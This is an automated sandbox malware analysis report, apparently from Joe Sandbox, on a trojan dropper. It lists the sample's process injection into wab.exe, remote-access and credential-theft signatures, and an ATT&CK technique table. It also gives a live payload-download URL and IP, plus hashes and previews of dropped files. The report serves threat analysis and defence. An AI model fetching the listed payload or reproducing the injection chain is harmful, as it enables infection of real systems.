          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeAPI call chain: ExitProcess graph end nodegraph_0-3462
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04627801 LdrInitializeThunk,1_2_04627801
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29CFAC8Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UI3GSTJump to behavior
          Source: Yara matchFile source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          OS Credential Dumping3
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Obfuscated Files or Information
          LSASS Memory14
          System Information Discovery
          Remote Desktop Protocol1
          Clipboard Data
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Command and Scripting Interpreter
          Logon Script (Windows)111
          Process Injection
          1
          Software Packing
          Security Account Manager11
          Security Software Discovery
          SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell
          Login HookLogin Hook1
          DLL Side-Loading
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput Capture1
          Remote Access Software
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Masquerading
          LSA Secrets31
          Virtualization/Sandbox Evasion
          SSHKeylogging1
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
          Virtualization/Sandbox Evasion
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input Capture111
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
          Process Injection
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Q20240425 MAX5073626.com.exe13%ReversingLabsWin32.Trojan.Generic
          Q20240425 MAX5073626.com.exe21%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe13%ReversingLabsWin32.Trojan.Generic
          C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe21%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://193.239.86.203/XWJPh99.binW0%Avira URL Cloudsafe
          193.239.86.2030%Avira URL Cloudsafe
          http://193.239.86.203/XWJPh99.bin0%Avira URL Cloudsafe
          193.239.86.2030%VirustotalBrowse
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          193.239.86.203true
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://193.239.86.203/XWJPh99.bintrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://193.239.86.203/XWJPh99.binWwab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            • URL Reputation: malware
            unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://contoso.com/powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://nsis.sf.net/NSIS_Error...Q20240425 MAX5073626.com.exe, Q20240425 MAX5073626.com.exe.1.drfalse
                    high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        193.239.86.203
                        unknownRomania
                        35215MERITAPLtrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1431846
                        Start date and time:2024-04-25 21:35:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 25s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:9
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Q20240425 MAX5073626.com.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@8/11@0/1
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 91%
                        • Number of executed functions: 87
                        • Number of non-executed functions: 34
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 6636 because it is empty
                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Not all processes where analyzed, report is missing behavior information
                        TimeTypeDescription
                        21:35:57API Interceptor44x Sleep call for process: powershell.exe modified
                        21:37:26API Interceptor132019x Sleep call for process: wab.exe modified
                        No context
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        MERITAPLtUqZNOmm4N.exeGet hashmaliciousUnknownBrowse
                        • 193.239.84.207
                        tUqZNOmm4N.exeGet hashmaliciousUnknownBrowse
                        • 193.239.84.207
                        https://r20.rs6.net/tn.jsp?f=001TSlaXHeZHfjf7OZ5K8yup3PpRPnAI8u3-19KxQJ8L5nNh_d9YjpfjWGupQCBUnRrB3E9OGJwZ8EDD2imwuw20R20TVoilATwizXX9WPCYkxIsPJovI_F-65BL88LHP99D_uCeZrH3LnhuGY18V9s7bYi3YWrHVgvALikGguZ-dQ=&c=r_U7gJAN45HNKHClodPhxSlY4DkmbioISAi0CoXVlE4UXOHEGYKkcQ==&ch=TbxE6RuJ34_GSnvRMC7FbVsjB-Vyit1bo9N-cBXP4PiV2cw_s2Sfgw==&__=?TFs7h=YW1jY2FpbkBoZW5zbGV5LmNvbQ==Get hashmaliciousUnknownBrowse
                        • 193.239.86.148
                        https://r20.rs6.net/tn.jsp?f=001TSlaXHeZHfjf7OZ5K8yup3PpRPnAI8u3-19KxQJ8L5nNh_d9YjpfjWGupQCBUnRrB3E9OGJwZ8EDD2imwuw20R20TVoilATwizXX9WPCYkxIsPJovI_F-65BL88LHP99D_uCeZrH3LnhuGY18V9s7bYi3YWrHVgvALikGguZ-dQ=&c=r_U7gJAN45HNKHClodPhxSlY4DkmbioISAi0CoXVlE4UXOHEGYKkcQ==&ch=TbxE6RuJ34_GSnvRMC7FbVsjB-Vyit1bo9N-cBXP4PiV2cw_s2Sfgw==&__=?WfAXv=c2dpbGxpc0BmdGd0ZWNobm9sb2dpZXMuY29tGet hashmaliciousUnknownBrowse
                        • 193.239.86.148
                        http://bofamg9tyg4b2o27vhp605cll44qj6.xyzGet hashmaliciousUnknownBrowse
                        • 193.239.86.148
                        https://r20.rs6.net/tn.jsp?f=001TSlaXHeZHfjf7OZ5K8yup3PpRPnAI8u3-19KxQJ8L5nNh_d9YjpfjWGupQCBUnRrB3E9OGJwZ8EDD2imwuw20R20TVoilATwizXX9WPCYkxIsPJovI_F-65BL88LHP99D_uCeZrH3LnhuGY18V9s7bYi3YWrHVgvALikGguZ-dQ=&c=r_U7gJAN45HNKHClodPhxSlY4DkmbioISAi0CoXVlE4UXOHEGYKkcQ==&ch=TbxE6RuJ34_GSnvRMC7FbVsjB-Vyit1bo9N-cBXP4PiV2cw_s2Sfgw==&__=?dJELV=cHJvY2hlQG1vb2cuY29tGet hashmaliciousUnknownBrowse
                        • 193.239.86.148
                        https://r20.rs6.net/tn.jsp?f=001TSlaXHeZHfjf7OZ5K8yup3PpRPnAI8u3-19KxQJ8L5nNh_d9YjpfjWGupQCBUnRrB3E9OGJwZ8EDD2imwuw20R20TVoilATwizXX9WPCYkxIsPJovI_F-65BL88LHP99D_uCeZrH3LnhuGY18V9s7bYi3YWrHVgvALikGguZ-dQ=&c=r_U7gJAN45HNKHClodPhxSlY4DkmbioISAi0CoXVlE4UXOHEGYKkcQ==&ch=TbxE6RuJ34_GSnvRMC7FbVsjB-Vyit1bo9N-cBXP4PiV2cw_s2Sfgw==&__=?aeTOH=cGF1bGEuY29ubmVyQGFwcmlhLmNvbQ==Get hashmaliciousUnknownBrowse
                        • 193.239.86.148
                        #Remit-INV34011.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 193.239.84.207
                        https://protect-eu.mimecast.com/s/T6pRC8qvns8pVlhne8Fl?domain=pba.phGet hashmaliciousHTMLPhisherBrowse
                        • 193.239.84.207
                        New Order PO- 19A20060 Quote for BPGIC-UAEProject-Items-Specifications.htmGet hashmaliciousUnknownBrowse
                        • 193.239.84.207
                        No context
                        No context
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):8003
                        Entropy (8bit):4.838950934453595
                        Encrypted:false
                        SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                        MD5:4C24412D4F060F4632C0BD68CC9ECB54
                        SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                        SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                        SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                        Process:C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
                        File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 4.716187
                        Category:dropped
                        Size (bytes):305856
                        Entropy (8bit):7.752758381192852
                        Encrypted:false
                        SSDEEP:6144:mvBTPxsNZQjgA3c5eELmmcH0KkaHdLOm14a8h34UzqehD06oXGV:WV7ehz40KzdLHyI1e5xn
                        MD5:4433AA89BB2E3B2CD206C9F6EE4B88E2
                        SHA1:889695DB99AA5CF9DEB29D599560C84FDEB6A56F
                        SHA-256:980B91AE25A9F486F7C303C942DE6D6C25DA5E5B681156ECB59ECD52B024FEC7
                        SHA-512:E81E20D296A5C53328DBD19902AB279601A2BA53D1ED9C004895B2BACF92FB5EC58FD0A644DA6BE814CBADDE9C90F4E29528DE79CB8926BC27C6EC54EBD33CF0
                        Malicious:false
                        Reputation:low
                        Preview:...*..................*.?.........q....{...........P.......?..........1..............................~...............[[.......................................p..C......................{{{{.......w.'..............!..................**.........J.00........................?.......::::.............33.....AA.....c........l.............~...ll.888....EE.L.a....A...............=.m........................................y..LL...............>>.....s................FF.....................hh.7........s.22.......................L.........OOOO......mmmmmmm....7..............................W..I.RR.............O.v...........qqq................ss.....................................z......l.......m....................................>>.............................h....... .\....j.....ZZ.EEE...........................................yy..B..............Z............................FFFFFF......::.....;;;.................''''''....%%%%.....e...........%.0000....D.......................................".
                        Process:C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):211532
                        Entropy (8bit):1.0283457658459343
                        Encrypted:false
                        SSDEEP:768:HheYoYgU/XFwHKu/qVTJCxEgFafhhajvv9bxEsTcrDSqoiEScHk35Jnmhp8srwwC:Q6uiJnMSfe9XHS
                        MD5:C981A5BAC46989F9C8511CB0DEBC2DBC
                        SHA1:B01BE3D9E670623D138108991EA13753E73C74C1
                        SHA-256:1A7C277FB80BF5743E3F3A8B43C83C2BA69A8D4D0FBFE133EC2E9E76D1DAB642
                        SHA-512:F9D152F253E1A277515CB51B3D01E431B6FC53BF2314F91CC535AC5D23079BA937DB8E35B9E880810E5BC02AFB35C7072428DBFB72A37415DC51598DCE3ACCFB
                        Malicious:false
                        Reputation:low
                        Preview:..............Z............o....................&.Y......<.................................................g....^..................................................................................N..............................@.......................D.....................................................................................z.................................................................................................A...............R..............2........$...................g........................................................R......................................V.............Q...V........................................h............7......?................................................................Y...........................................................................................................................w...............................[..........................=............................................:..................H.........d.......
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:dropped
                        Size (bytes):794761
                        Entropy (8bit):6.8128663964483165
                        Encrypted:false
                        SSDEEP:12288:K0Z4SNwhFaoncbHNsyBNzjdsO8aIaLJtBT7bbQ4:J4SO/wbtsQ9jdsFaxl3bbT
                        MD5:1C089552C29F12843D8CD8E2BBF5CF5B
                        SHA1:6F3E611FC7D7D5938B99575BCD96366D6E213EAB
                        SHA-256:76DBFA281B158A18C83D08A907F087B7330DA28BDD2298EB9EE2F23C1DF40491
                        SHA-512:3F6220CE4196EA9EC13EF699A8B8E51E8A7D5035511F8B252230BCC024E423610D5474587030F68DBFC5193BD02402975B6F71E9E352FD17453519748AB3A885
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 13%
                        • Antivirus: Virustotal, Detection: 21%, Browse
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.#!{}Mr{}Mr{}Mr0.Isy}Mr0.Ksz}Mr0.Lst}Mr{}Lr.}Mr..Isp}Mr...rz}Mr..Osz}MrRich{}Mr........................PE..L...j.}d.................n...$.......6............@.......................................@.............................................X............................................................................................................text....l.......n.................. ..`.rdata..L............r..............@..@.data... ...........................@....ndata...p...............................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):99848
                        Entropy (8bit):1.0220542563119581
                        Encrypted:false
                        SSDEEP:384:xoP85OaCXgL8vOiUii8TE2a+kjnoARGlZiPOSzM9gRTZ+yOTlRhQW4E1hGu6neF7:D5EeiHPcpRO59UEyOTVDUn+
                        MD5:5A481E8570583297CD05B59C10C4D944
                        SHA1:F695A764A65F552B400EE1DBA500FAE438C76F35
                        SHA-256:C15D61C0F645CB800E4B38F0D9775FFE114BA9A01DD6CD14541E88C9A40C6F6F
                        SHA-512:C2386D890C4E149C13308B0410F0C0BE1ADDA09C56C3C8E62E934F02FA017FA116F8E875767A345D38787E4AA5F385FDCFF2BF2B491C55613AF1A6D8C970697D
                        Malicious:false
                        Reputation:low
                        Preview:........................i...E.........................................................!.................................................................................................................................................................%........{.....................%.........................*..........................................................8............................w....."e.................*................................T......................................................................................................\............................................................S..a......................L....+.............................................................................................................a.................G....................................."................................................]..................J........... ................................................."...............$.......................................
                        Process:C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
                        File Type:ASCII text, with very long lines (318), with CRLF line terminators
                        Category:dropped
                        Size (bytes):462
                        Entropy (8bit):4.276728693612834
                        Encrypted:false
                        SSDEEP:12:QA2YrdRblstTarSS87cMqOO0HRS3faTdcOHKNMn:VP5dearS71FRZctin
                        MD5:803632F61D28D427E0DFE60D69BA4783
                        SHA1:049FAC935D43A8EDFF81D3DCC476FB848602AB36
                        SHA-256:848D0F365B637E26771C93E13546C50F7A09F56BFEDFAB9D632F926BD614C06B
                        SHA-512:403F6FD16098ED296ABD1A42289AE3285BE53309D43F2B61F02CFB4F1CDE1D6DAA93248FF371485ABCB4FE986B8A3865D9920C69E0FD79D83B338547FD715EA9
                        Malicious:false
                        Reputation:low
                        Preview:vrdireduktioner reduplicatively millennial undervisningstrinenes,applicableness efterlavet stablevognene testacea precorruptive smur,beaujolaisernes allocates subhypercube rvturen.brandkorpset hjpuldet majesttisk skrappe deratization martaban lorelei trokiske skrigenes tippedes bindehindes skrmarbejders atomreaktorer..forskningsprojektets feluccas fribords served studiekredsen afsmagen intermise..boblekammerets saluterendes carboxyhemoglobin anlet bigamists.
                        Process:C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):172798
                        Entropy (8bit):1.0313470307928116
                        Encrypted:false
                        SSDEEP:768:C8az3L5eRFAJj22YTbw2D6rAAnxcbzwApYW+rb0sL5sflOpEAzMnV/4:We6C1V
                        MD5:C5F9C46DAAA49AB38AE0302183F7B859
                        SHA1:4B63F386DF42070B367582E9A11883F3531E560B
                        SHA-256:C28B4EB84287DACFA2AD949D67909FB62B0FFF7427105AAE4AAE701037D9E5BF
                        SHA-512:A609C8C1E4ADC36AB139786924363B9C3BC1A566613C311BCFAF05260B9F8DA4ABF0A1244C4E285B0147583701EDAD8A1572EC8571845AFC868984D127EF74CE
                        Malicious:false
                        Preview:..f........q..............................#.............................. ...........................................................................................j........................................a................................LDT................................................................................t.........W...........s...................................................................................................*..........................................................<.......................................o...........................?.................?..........................................................u....................................................D...............................................1.........................................+..H..................................s.....k..............%......................#..............................................................................................................................
                        Process:C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):84883
                        Entropy (8bit):5.134488916230944
                        Encrypted:false
                        SSDEEP:1536:sJn8+IWbd2Gpiv/reaOJ9NsXYMc/QcZrnsHTvo8O7iFPniPsQUwuH2oQ:+pbsGpiv/yfwo1/VZLMs86i0kQUwuH2F
                        MD5:C986903B6D507CF170E00CB73E2AFE97
                        SHA1:4D54E166C2EC5E7844AE0C93C1E25DC3104AD9EF
                        SHA-256:AAE5ED65A22D59635BD7451A31C91C91C7D3D9265DB88BB6DE3FABA46E1CCA30
                        SHA-512:9C0DB6DE2FAE46D696EAB9F036FD45E732CD7B8912B68448C83F0DCF0D32A4A804B965C225A849251B7200FE865F06873E894E3B1570E980FBBC73E39D21ECA5
                        Malicious:true
